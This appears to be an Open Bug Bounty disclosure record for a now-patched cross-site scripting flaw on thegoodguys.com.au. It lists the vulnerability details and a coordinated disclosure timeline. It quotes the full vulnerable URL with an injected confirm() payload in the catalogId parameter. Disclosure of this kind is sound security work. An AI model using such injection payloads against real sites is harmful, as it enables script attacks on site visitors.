thegoodguys.com.au XSS vulnerability

2017-02-24T04:06:00
ID OBB:215122
Type openbugbounty
Reporter Spam404
Modified 2017-05-19T08:20:00

Description

Vulnerable URL:
https://www.thegoodguys.com.au/AjaxOrderItemDisplayView?catalogId=30000%27-confirm`OPENBUGBOUNTY`-%27&langId;=-1&storeId;=900&krypto;=RYO2yLMD%2BDvAN1%2Bm7Zye0eAvwZJf3dk5bJfhoPcDrF7VfXD2tteXRZZwzLIdWLPVL%2B7eStgSAee19OWF7bpC6l92fsKZ%2BA6L%2BLtw2Dg6Mysb3qDoLOBC4vY8XdpT%2BEVl8ATtUXkQaVAO%2BvbYRTZMk6xdWXAyRuaE43lWm6aW7%2FE%3D
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 13978
VIP website status:| Yes
Check thegoodguys.com.au SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 February, 2017 04:06 GMT
Vulnerability existence verified and confirmed| 24 February, 2017 07:41 GMT
Notification sent to subscribers (without technical details)| 24 February, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 19 May, 2017 08:16 GMT
Vulnerability patched by the website owner| 19 May, 2017 08:20 GMT